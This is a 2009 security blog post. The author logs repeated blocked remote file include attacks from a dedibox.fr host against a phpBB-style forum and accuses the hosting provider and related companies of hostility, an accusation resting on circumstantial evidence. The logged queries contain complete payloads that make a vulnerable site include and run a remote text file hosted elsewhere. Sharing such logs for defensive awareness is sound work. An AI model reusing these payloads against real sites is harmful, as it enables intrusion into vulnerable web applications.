Spambot Security Blog : PROOF THAT DEDIBOX.FR IS HOSTILE, and possibly laycat too.

« Blocking the *.amazonaws.com domain with ZB Block, and why. | Main | Booyeah! Nailed one to the wall! Scratch one bot variant. »

Wednesday, April 15, 2009

PROOF THAT DEDIBOX.FR IS HOSTILE, and possibly laycat too.

Remember what I said about no one notices the robber casing the joint, but everyone notices when he's committing / committed the crime? Remember my go-arounds with laycat.com, kyklo.com, aceleo.com, and their more than willing to share IP space host, dedibox.fr?

Witness if you will, a vengeance script attack on a well defended website with two doors, and the results that are gleaned when a quick minded sentry is guarding one of those doors. The problem is, the other door, the one our attacker will go through, does not lead to satisfaction, but a grim reminder that they have stepped into... The Toilet Zone.

#: 6594 @: Tue, 14 Apr 2009 13:53:55 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6625 @: Tue, 14 Apr 2009 14:21:17 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Then again:

#: 6627 @: Tue, 14 Apr 2009 14:26:40 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6633 @: Tue, 14 Apr 2009 14:27:14 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Changing method to:

#: 6634 @: Tue, 14 Apr 2009 14:40:50 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Through:

#: 6644 @: Tue, 14 Apr 2009 14:44:57 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query:name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org ///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????

Oh no, not again, just 2 this time...

#: 6663 @: Wed, 15 Apr 2009 00:20:15 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??

and...

#: 6664 @: Wed, 15 Apr 2009 00:20:27 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??

Now I know that none of these attacks came from laycat.com , aceleo.com , or kyklo.com adresses themselves. But I have shown, beyond reasonable doubt, that laycat uses other IPs in the dedibox.fr domain with great freedom and regularity. Draw your own conclusions, but I say they're RIDIN' DIRTY.

Please note that attack 3, consisting of 11 shots, occurred in 7 seconds, almost 2 slams a second... ZB Block, handled it with grace, and did as it was supposed to.

All in all, it looks like I caught me a weasel in the hen house, dedibox.fr is now attacksville forever, and I suggest that whatever method of blocking your site uses, that you ban the domain dedibox.fr until I see some good reason that their server needs to surf your site.

Posted by Zaphod at 2:05 AM Mountain Daylight Time
Categories: Exploit Bot, RBN